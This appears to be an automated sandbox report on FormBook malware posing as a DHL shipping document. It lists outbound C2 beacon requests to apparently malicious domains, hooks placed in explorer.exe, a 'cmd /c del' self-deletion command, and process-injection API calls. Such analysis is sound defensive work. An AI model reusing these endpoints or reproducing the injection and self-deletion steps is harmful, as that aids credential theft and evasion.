Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.8	49779	198.54.117.215	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2023 13:33:43.526293039 CEST	164	OUT	GET /cy12/?AvCxnt=iyef6EjVDd/dvjgrsxJwH1FkI7yMzM3jQxJ7rAziOaY8j1mxZQA+oVnGNKxpGmfMvyVL&ofut_l=u6Ap0tUPWV20 HTTP/1.1 Host: www.ungravity.dev Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.8	49782	103.156.178.63	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2023 13:34:11.885771990 CEST	199	OUT	GET /cy12/?AvCxnt=8ffpABDRKHDHAf13ISyYk2Bezqt16eZbRMX7TrFKwtVzHuBqZwyD4rylxhwg/kMizB1s&ofut_l=u6Ap0tUPWV20 HTTP/1.1 Host: www.pmugly.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2023 13:34:15.056798935 CEST	200	OUT	GET /cy12/?AvCxnt=8ffpABDRKHDHAf13ISyYk2Bezqt16eZbRMX7TrFKwtVzHuBqZwyD4rylxhwg/kMizB1s&ofut_l=u6Ap0tUPWV20 HTTP/1.1 Host: www.pmugly.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2023 13:34:16.563534975 CEST	204	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 14 Sep 2023 11:34:12 GMT Content-Length: 1605 Content-Type: text/html; charset=gb2312 ETag: "b8154d4ffb24e0fd" Last-Modified: Thu, 14 Sep 2023 11:34:12 GMT Vary: Accept-Encoding Content-Encoding: gzip Connection: keep-alive Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e cf db 45 99 be 5b 94 cb e6 b3 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee ee 3e 7c f8 f0 ee 3b b4 f9 e8 e8 37 4e 1e cf f3 6c 86 9f cd b4 2e 56 ed d1 ac 9a ae 17 f9 b2 1d b7 45 5b e6 9f 7d fc 8f ff f7 ff da 2f fb 17 ff ad 7f e8 6f ff 47 fe d1 bf f7 6f fc 97 ff ca bf f7 6f fc bb ff b2 7f f5 5f fa 17 ff 83 bf fb af fd 67 ff 81 8f 0f 1f df d5 97 e8 75 6e 7e f4 0b 7f fc e0 e0 70 d3 3f f7 ef df a3 1f 7b 3b 3b bb fc 73 6f ef d3 87 f2 f7 0e Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~\|?"E[mzt/>\|;7Nl.VE[}/oGoo_gun~p?{;;so
Sep 14, 2023 13:34:16.563618898 CEST	205	IN	Data Raw: be de fb 74 77 77 ff eb fc dc 7b b8 c3 70 0e 76 f7 ef fb f0 2c fc dd 7b fc f9 c3 bd 7b dc ef fd 4f ef ed 48 bb bd 4f fd cf ef dd df 7f c0 df ef 09 dc 83 4f 05 ce fe 83 07 8a 37 ff 7d 8f 7e 72 bb 9d dd fb d2 ff c1 ae c2 bb c7 9f 3f fc 94 f1 b9 77 Data Ascii: tww{pv,{{OHOO7}~r?woW)~< je?m~}UtZ-[>r?=^/wwd{}-]K%3S&vB63{v}_=tGvR<d
Sep 14, 2023 13:34:16.563654900 CEST	206	IN	Data Raw: f9 bb f6 2e d4 f2 61 3a 9d 67 75 93 b7 9f 5d 4c 68 d8 7b 0a e7 6e a8 a9 d3 96 5e d7 b7 7e 3a bb cc e4 d3 8f 8e 7e ec 37 4e 92 df 38 d9 3a 5f 2f a7 e0 b5 ad 3b e9 2f fe 8d 93 94 9e cb ac 4e d7 75 79 5c d7 e9 67 e9 f7 e4 33 3c 1f 03 b7 86 6c c4 ba Data Ascii: .a:gu]Lh{n^~:~7N8:_/;/Nuy\g3<l:u>mixspt>7`rV-^e\|K>1$[x}(UY,Q>~<+.&</.w?LY;7LZ/gGi}1VUS
Sep 14, 2023 13:34:16.563688993 CEST	206	IN	Data Raw: 5c 51 d9 fa 18 fa ea e3 10 32 bf 32 86 1d 83 f0 5d 16 f9 d5 aa aa 5b 37 e3 ae 8d 6a 33 34 13 76 9d e5 97 c5 34 df e6 3f 46 2a 38 db cd 34 23 c9 dd 1d 2d e8 83 c5 7a e1 fe ce de 05 7f b3 46 c2 1f d9 84 fe 5e 56 61 8f 37 10 12 ea 52 08 99 ad 56 44 Data Ascii: \Q22][7j34v4?F*84#-zF^Va7RVDyQMt$ftn4WXD=KH'_yY;UUo1R/<Gwc>X<?O\|tMljLt=<t={{r{~
Sep 14, 2023 13:34:19.950217009 CEST	210	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 14 Sep 2023 11:34:12 GMT Content-Length: 1605 Content-Type: text/html; charset=gb2312 ETag: "b8154d4ffb24e0fd" Last-Modified: Thu, 14 Sep 2023 11:34:12 GMT Vary: Accept-Encoding Content-Encoding: gzip Connection: keep-alive Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e cf db 45 99 be 5b 94 cb e6 b3 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee ee 3e 7c f8 f0 ee 3b b4 f9 e8 e8 37 4e 1e cf f3 6c 86 9f cd b4 2e 56 ed d1 ac 9a ae 17 f9 b2 1d b7 45 5b e6 9f 7d fc 8f ff f7 ff da 2f fb 17 ff ad 7f e8 6f ff 47 fe d1 bf f7 6f fc 97 ff ca bf f7 6f fc bb ff b2 7f f5 5f fa 17 ff 83 bf fb af fd 67 ff 81 8f 0f 1f df d5 97 e8 75 6e 7e f4 0b 7f fc e0 e0 70 d3 3f f7 ef df a3 1f 7b 3b 3b bb fc 73 6f ef d3 87 f2 f7 0e Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~\|?"E[mzt/>\|;7Nl.VE[}/oGoo_gun~p?{;;so

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE7
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE7
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE7
GetMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE7

Target ID:	0
Start time:	13:30:17
Start date:	14/09/2023
Path:	C:\Users\user\Desktop\DHL_Shipping_Documents.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\DHL_Shipping_Documents.exe
Imagebase:	0xbc0000
File size:	651'264 bytes
MD5 hash:	7581C03582CB6D3BB72E1E11AF6BD9B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:30:18
Start date:	14/09/2023
Path:	C:\Users\user\Desktop\DHL_Shipping_Documents.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\DHL_Shipping_Documents.exe
Imagebase:	0xa40000
File size:	651'264 bytes
MD5 hash:	7581C03582CB6D3BB72E1E11AF6BD9B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:30:18
Start date:	14/09/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff62dba0000
File size:	5'308'592 bytes
MD5 hash:	DDB206DDECAF3B327A418B262EE33468
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.3461422392.000000000E916000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	13:30:20
Start date:	14/09/2023
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x560000
File size:	4'676'944 bytes
MD5 hash:	6F5D250EAEDE1D80806ECBC487C7B9B8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:30:23
Start date:	14/09/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\DHL_Shipping_Documents.exe"
Imagebase:	0x120000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:30:23
Start date:	14/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff78b990000
File size:	873'472 bytes
MD5 hash:	86191D9E0E30631DB3E78E4645804358
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	276
Total number of Limit Nodes:	20

Executed Functions

Function 05629F08 Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.994541910.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5620000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 494948c47a1d1e5001d27e3d16b7b10902ddc0e99af335d3d093bcd17c015993
Instruction ID: 3bace947add45f439ed4e8027e9a751dec9b0fe7bbdc169d34933e644169a0e3
Opcode Fuzzy Hash: 494948c47a1d1e5001d27e3d16b7b10902ddc0e99af335d3d093bcd17c015993
Instruction Fuzzy Hash: 4E520434600614CFCB14DFA8C588AADB7F2BF88315F1585A8E40A9B761DBB5EC86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 015E4AB8 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b843dd9e0754392ee9e5a56e1d18026969cea73705f92ef76db8e5395e3acb
Instruction ID: a2ddadaf8b9d1d973108ed61e9258dc4acacf4874c062a12697a96411a2a79e7
Opcode Fuzzy Hash: 08b843dd9e0754392ee9e5a56e1d18026969cea73705f92ef76db8e5395e3acb
Instruction Fuzzy Hash: B4B18232A087D19BC765EE3D980C21676C0BB561B9F29439DE5A8DF3D6D3728851C309

Uniqueness

Uniqueness Score: -1.00%

Function 015E4B00 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c99693c6f3a04a4f4152e9482f308f807f3554b965b279c936e6508f82c62539
Instruction ID: 4f922b8216bdab57aa7890eed77928e035a6556bc634141017524c8865c3dd7b
Opcode Fuzzy Hash: c99693c6f3a04a4f4152e9482f308f807f3554b965b279c936e6508f82c62539
Instruction Fuzzy Hash: 94814F73C08BD25BC769EE39C40C145BAD1AB162BCF2883DDD5A89E2E2D7778885C705

Uniqueness

Uniqueness Score: -1.00%

Function 015ED3F9 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015ED486
GetCurrentThread.KERNEL32 ref: 015ED4C3
GetCurrentProcess.KERNEL32 ref: 015ED500
GetCurrentThreadId.KERNEL32 ref: 015ED559

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d6dd3b84747fdc082e483bdfa9cd86519a7a17fd6fcb7ee43259c48942b34fd3
Instruction ID: 9d3286f194eca7799e43abcbbe03bb904dc67586ca030fe6831c37cd93c74cb0
Opcode Fuzzy Hash: d6dd3b84747fdc082e483bdfa9cd86519a7a17fd6fcb7ee43259c48942b34fd3
Instruction Fuzzy Hash: 7F5189B0D007498FDB18CFA9D948BEEBBF1BF88304F20845AE419A7390D7359985CB25

Uniqueness

Uniqueness Score: -1.00%

Function 015ED408 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015ED486
GetCurrentThread.KERNEL32 ref: 015ED4C3
GetCurrentProcess.KERNEL32 ref: 015ED500
GetCurrentThreadId.KERNEL32 ref: 015ED559

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 818f7abdb0f44456086234444f8ca68df8d16936883f8109fe792ea70ab9f247
Instruction ID: 473706de638b92e05282c0e6c7f270f9215b6c15727693e69f1ffa0e42b7c146
Opcode Fuzzy Hash: 818f7abdb0f44456086234444f8ca68df8d16936883f8109fe792ea70ab9f247
Instruction Fuzzy Hash: ED5178B0D007498FDB18DFA9D948BAEBBF1BF88304F208459E419A7390D774A984CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05BE7B78 Relevance: 1.8, APIs: 1, Instructions: 250
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05BE7E46

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7aca0486184308da9dcab50af17b11179587d4a95a7bd8ad311215874e89cd30
Instruction ID: 4a6b151f35372efcb82b6662473358931dd61f015b2c4fdd4715474112b2d838
Opcode Fuzzy Hash: 7aca0486184308da9dcab50af17b11179587d4a95a7bd8ad311215874e89cd30
Instruction Fuzzy Hash: 1291BF70A045659BCB05CB29C980ABAFBF6FF85310B28C659E56697359CB34EC41CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 05BE8115 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05BE8356

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6a2be3360db308dc5ec768944eac4324394702b68c7bc18c42e4b6800a088ce3
Instruction ID: 76bb4b69f6b2824e4b37b5372fbc6ebbbbe38071f95f4de6231335e36709c223
Opcode Fuzzy Hash: 6a2be3360db308dc5ec768944eac4324394702b68c7bc18c42e4b6800a088ce3
Instruction Fuzzy Hash: E1A15D71D00A199FDB14CFA8C845BEEBBB2FF48310F1885A9E819A7250D774A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05BE8120 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05BE8356

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3fa4cfebce45754722aec27c24ba7f5ffe7ac7f280e5312dd1fdf4daea18c37d
Instruction ID: 4bb6725704a9e3a2a62c25c1f93eb033a51f39e6d6b7e6e5b6f36f0971da7af8
Opcode Fuzzy Hash: 3fa4cfebce45754722aec27c24ba7f5ffe7ac7f280e5312dd1fdf4daea18c37d
Instruction Fuzzy Hash: 45913C71D00A199FDB14DFA8C845BEEBBB2FF48310F1885A9E819A7240D774A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 015EAD68 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015EAFBE

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e848af51ad8e848ac5fb98b6d31385a7aa03a7cfd7e5d3f3a682ff7641e73106
Instruction ID: 17e1f3f6d133a4a93f56c248872c8db9392f8fe4fc3dcfe109802ab872285b55
Opcode Fuzzy Hash: e848af51ad8e848ac5fb98b6d31385a7aa03a7cfd7e5d3f3a682ff7641e73106
Instruction Fuzzy Hash: 17811270A00B058FDB28DF39D45976ABBF1FF88304F008A2DD59A9BA40D775E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 015E44D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015E59C9

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 80b3a03b2ba47d5c8843b7c71389aad3c8307f978f509523db40d3dc0cd75d5b
Instruction ID: 9a4bdeece82bd8e53430d792164cebcca3379502149bdd3f17984689d7aafd57
Opcode Fuzzy Hash: 80b3a03b2ba47d5c8843b7c71389aad3c8307f978f509523db40d3dc0cd75d5b
Instruction Fuzzy Hash: 0641D2B4C00719CFDB24DFA9C888ACEBBF6BF49304F60815AD409AB251DB755949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 015E590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015E59C9

Memory Dump Source

Source File: 00000000.00000002.992596863.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 381482868a138128a0153892f00e40d0397fd5f7a33d3d9e9a3889662c0c1cf6
Instruction ID: 7013065d44b966e63d931e1327fb07ce3de7c55eb5800428555ff74ab83c0dc2
Opcode Fuzzy Hash: 381482868a138128a0153892f00e40d0397fd5f7a33d3d9e9a3889662c0c1cf6
Instruction Fuzzy Hash: 9741D1B4C00719CFDB24DFA9C984ADEBBF2BF49304F20815AD409AB251EB756949CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05BE7E91 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05BE7F28

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 171c86b4583e8670e234287f4f083cc8cc74b9188b67b21a38c089eadcbaef2f
Instruction ID: 81e315d62833ce721c8e6a309040f37b47038d71ba9ee334859bae8b050ae2cc
Opcode Fuzzy Hash: 171c86b4583e8670e234287f4f083cc8cc74b9188b67b21a38c089eadcbaef2f
Instruction Fuzzy Hash: 182106B19002899FCB10CFAAC985BDEBBF5FF48310F148429E919A7351D778A945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 056275B0 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0562759D,?,?), ref: 0562764F

Memory Dump Source

Source File: 00000000.00000002.994541910.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5620000_DHL_Shipping_Documents.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 9803b3d89eb072b2fbeed21f3a5f7c312fe55dc812afcb43a16e8f7fe1449e70
Instruction ID: f94f4941f9616e61ceb787ec897e626d20e5d8216ece4ba91ca1397b530e63d4
Opcode Fuzzy Hash: 9803b3d89eb072b2fbeed21f3a5f7c312fe55dc812afcb43a16e8f7fe1449e70
Instruction Fuzzy Hash: E631E0B5D012499FCB10CF9AD884ADEFBF5FB48310F14842AE919A7710D374A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 056268CC Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0562759D,?,?), ref: 0562764F

Memory Dump Source

Source File: 00000000.00000002.994541910.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5620000_DHL_Shipping_Documents.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 457da989ce18269ed5756d6adab49ad3bedbe60bf420d754faba34ed80061fe6
Instruction ID: 2c60ad4a37fab11d0784339c21195add78c185c702b792a44c4d48f32f7ee8b4
Opcode Fuzzy Hash: 457da989ce18269ed5756d6adab49ad3bedbe60bf420d754faba34ed80061fe6
Instruction Fuzzy Hash: B131E0B59016599FCB10CF9AD884AAEFBF5FB48310F14842AE919A7310D774A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05BE7E98 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05BE7F28

Memory Dump Source

Source File: 00000000.00000002.994873152.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
